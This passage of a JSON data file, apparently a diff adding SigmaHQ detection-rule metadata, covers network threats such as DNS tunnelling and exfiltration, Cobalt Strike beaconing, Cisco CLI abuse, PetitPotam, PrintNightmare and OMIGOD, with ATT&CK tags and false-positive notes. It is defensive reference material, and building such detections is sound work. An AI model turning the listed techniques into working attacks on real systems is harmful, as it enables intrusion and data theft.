"attack.t1049", + "attack.t1033", + "attack.t1124" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_discovery.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Commonly used by administrators for troubleshooting" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ], + "creation_date": "2019/08/15", + "filename": "cisco_cli_dos.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "See what files are being deleted from flash file systems", + "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", + "value": "Cisco File Deletion", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1070.004", + "attack.t1561.001", + "attack.t1561.002" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_file_deletion.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Will be used sometimes by admins to clean up local flash space" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "See what commands are being input into the device by other people, full credentials can be in the history", + "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", + "value": "Cisco Show Commands Input", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_input_capture.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Not commonly run by administrators, especially if remote logging is configured" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_local_accounts.yml", + "author": "Austin Clark", + "level": "high", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Modifications to a config that will serve an adversary's impacts or persistence", + "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", + "value": "Cisco Modify Configuration", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" + ], + "tags": [ + "attack.persistence", + "attack.impact", + "attack.t1490", + "attack.t1505", + "attack.t1565.002", + "attack.t1053" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_modify_config.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Various protocols maybe used to put data on the device for exfil or infil", + "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", + "value": "Cisco Stage Data", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" + ], + "tags": [ + "attack.collection", + "attack.lateral_movement", + "attack.command_and_control", + "attack.exfiltration", + "attack.t1074", + "attack.t1105", + "attack.t1560.001" + ], + "creation_date": "2019/08/12", + "filename": "cisco_cli_moving_data.yml", + "author": "Austin Clark", + "level": "low", + "falsepositive": [ + "Generally used to copy configs or IOS images" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/08/11", + "filename": "cisco_cli_net_sniff.yml", + "author": "Austin Clark", + "level": "medium", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "logsource.category": "accounting", + "logsource.product": "cisco" + } + }, + { + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "value": "Possible DNS Tunneling", + "meta": { + "refs": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004", + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/04/07", + "filename": "net_dns_c2_detection.yml", + "author": "Patrick Bareiss", + "level": "high", + "falsepositive": [ + "Valid software, which uses dns for transferring data" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", + "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", + "value": "DNS Query to External Service Interaction Domains", + "meta": { + "refs": [ + "https://twitter.com/breakersall/status/1533493587828260866", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.reconnaissance", + "attack.t1595.002" + ], + "creation_date": "2022/06/07", + "filename": "net_dns_external_service_interaction_domains.yml", + "author": "Florian Roth, Matt Kelly (list of domains)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", + "value": "High DNS Bytes Out", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_bytes_out.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", + "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", + "value": "High NULL Records Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_null_records_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS requests amount from host per short period of time", + "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", + "value": "High DNS Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", + "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", + "value": "High TXT Records Requests Rate", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_dns_high_txt_records_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", + "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", + "value": "Cobalt Strike DNS Beaconing", + "meta": { + "refs": [ + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/05/10", + "filename": "net_dns_mal_cobaltstrike.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to Monero mining pools", + "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", + "value": "Monero Crypto Coin Mining Pool Lookup", + "meta": { + "refs": [ + "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" + ], + "tags": [ + "attack.impact", + "attack.t1496", + "attack.t1567" + ], + "creation_date": "2021/10/24", + "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Legitimate crypto coin mining" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries using base64 encoding", + "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", + "value": "Suspicious DNS Query with B64 Encoded String", + "meta": { + "refs": [ + "https://github.com/krmaxwell/dns-exfiltration", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/05/10", + "filename": "net_dns_susp_b64_queries.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", + "uuid": "c64c5175-5189-431b-a55e-6d9882158251", + "value": "Telegram Bot API Request", + "meta": { + "refs": [ + "https://core.telegram.org/bots/faq", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", + "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1102.002" + ], + "creation_date": "2018/06/05", + "filename": "net_dns_susp_telegram_api.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate use of Telegram bots in the company" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects strings used in command execution in DNS TXT Answer", + "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", + "value": "DNS TXT Answer with Possible Execution Strings", + "meta": { + "refs": [ + "https://twitter.com/stvemillertime/status/1024707932447854592", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2018/08/08", + "filename": "net_dns_susp_txt_exec_strings.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects wannacry killswitch domain dns queries", + "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", + "value": "Wannacry Killswitch Domain", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ], + "creation_date": "2020/09/16", + "filename": "net_dns_wannacry_killswitch_domain.yml", + "author": "Mike Wade", + "level": "high", + "falsepositive": [ + "Analyst testing" + ], + "logsource.category": "dns", + "logsource.product": "No established product" + } + }, + { + "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", + "uuid": "881834a4-6659-4773-821e-1c151789d873", + "value": "Equation Group C2 Communication", + "meta": { + "refs": [ + "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", + "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.g0020", + "attack.t1041" + ], + "creation_date": "2017/04/15", + "filename": "net_firewall_apt_equationgroup_c2.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS queries bytes amount from host per short period of time", + "uuid": "3b6e327d-8649-4102-993f-d25786481589", + "value": "High DNS Bytes Out - Firewall", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ], + "creation_date": "2019/10/24", + "filename": "net_firewall_high_dns_bytes_out.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "High DNS requests amount from host per short period of time", + "uuid": "51186749-7415-46be-90e5-6914865c825a", + "value": "High DNS Requests Rate - Firewall", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003", + "attack.command_and_control", + "attack.t1071.004" + ], + "creation_date": "2019/10/24", + "filename": "net_firewall_high_dns_requests_rate.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate high DNS requests rate to domain name which should be added to whitelist" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", + "value": "Network Scans Count By Destination IP", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2017/02/19", + "filename": "net_firewall_susp_network_scan_by_ip.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Detects many failed connection attempts to different ports or hosts", + "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", + "value": "Network Scans Count By Destination Port", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2017/02/19", + "filename": "net_firewall_susp_network_scan_by_port.yml", + "author": "Thomas Patzke", + "level": "medium", + "falsepositive": [ + "Inventarization systems", + "Vulnerability scans" + ], + "logsource.category": "firewall", + "logsource.product": "No established product" + } + }, + { + "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", + "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", + "value": "Domain User Enumeration Network Recon 01", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/OTRF/detection-hackathon-apt29/issues/37", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002", + "attack.t1082" + ], + "creation_date": "2020/05/03", + "filename": "zeek_dce_rpc_domain_user_enumeration.yml", + "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", + "level": "medium", + "falsepositive": [ + "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", + "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", + "value": "MITRE BZAR Indicators for Execution", + "meta": { + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1053.002", + "attack.t1569.002" + ], + "creation_date": "2020/03/19", + "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", + "author": "@neu5ron, SOC Prime", + "level": "medium", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", + "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", + "value": "MITRE BZAR Indicators for Persistence", + "meta": { + "refs": [ + "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.004" + ], + "creation_date": "2020/03/19", + "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", + "author": "@neu5ron, SOC Prime", + "level": "medium", + "falsepositive": [ + "Windows administrator tasks or troubleshooting", + "Windows management scripts or software" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls", + "meta": { + "refs": [ + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ], + "creation_date": "2021/08/17", + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "level": "medium", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", + "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", + "value": "Possible PrintNightmare Print Driver Install", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", + "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/corelight/CVE-2021-1675", + "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", + "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" + ], + "tags": [ + "attack.execution", + "cve.2021.1678", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/08/23", + "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", + "author": "@neu5ron (Nate Guagenti)", + "level": "medium", + "falsepositive": [ + "Legitimate remote alteration of a printer driver." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", + "value": "SMB Spoolss Name Piped Usage", + "meta": { + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2018/11/28", + "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", + "author": "OTR (Open Threat Research), @neu5ron", + "level": "medium", + "falsepositive": [ + "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate", + "meta": { + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.s0154" + ], + "creation_date": "2021/06/23", + "filename": "zeek_default_cobalt_strike_certificate.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", + "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", + "value": "DNS Events Related To Mining Pools", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" + ], + "tags": [ + "attack.t1569.002", + "attack.t1496" + ], + "creation_date": "2021/08/19", + "filename": "zeek_dns_mining_pools.yml", + "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", + "level": "low", + "falsepositive": [ + "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", + "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", + "value": "New Kind of Network (NKN) Detection", + "meta": { + "refs": [ + "https://github.com/nknorg/nkn-sdk-go", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + "https://github.com/Maka8ka/NGLite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2022/04/21", + "filename": "zeek_dns_nkn.yml", + "author": "Michael Portera (@mportatoes)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", + "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", + "value": "Suspicious DNS Z Flag Bit Set", + "meta": { + "refs": [ + "https://twitter.com/neu5ron/status/1346245602502443009", + "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", + "https://tools.ietf.org/html/rfc2929#section-2.1", + "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" + ], + "tags": [ + "attack.t1095", + "attack.t1571", + "attack.command_and_control" + ], + "creation_date": "2021/05/04", + "filename": "zeek_dns_susp_zbit_flag.yml", + "author": "@neu5ron, SOC Prime Team, Corelight", + "level": "medium", + "falsepositive": [ + "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", + "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ], + "creation_date": "2021/08/15", + "filename": "zeek_dns_torproxy.yml", + "author": "Saw Winn Naung , Azure-Sentinel", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav", + "meta": { + "refs": [ + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/OTRF/detection-hackathon-apt29", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2020/05/01", + "filename": "zeek_http_executable_download_from_webdav.yml", + "author": "SOC Prime, Adam Swan", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "zeek" + } + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE", + "meta": { + "refs": [ + 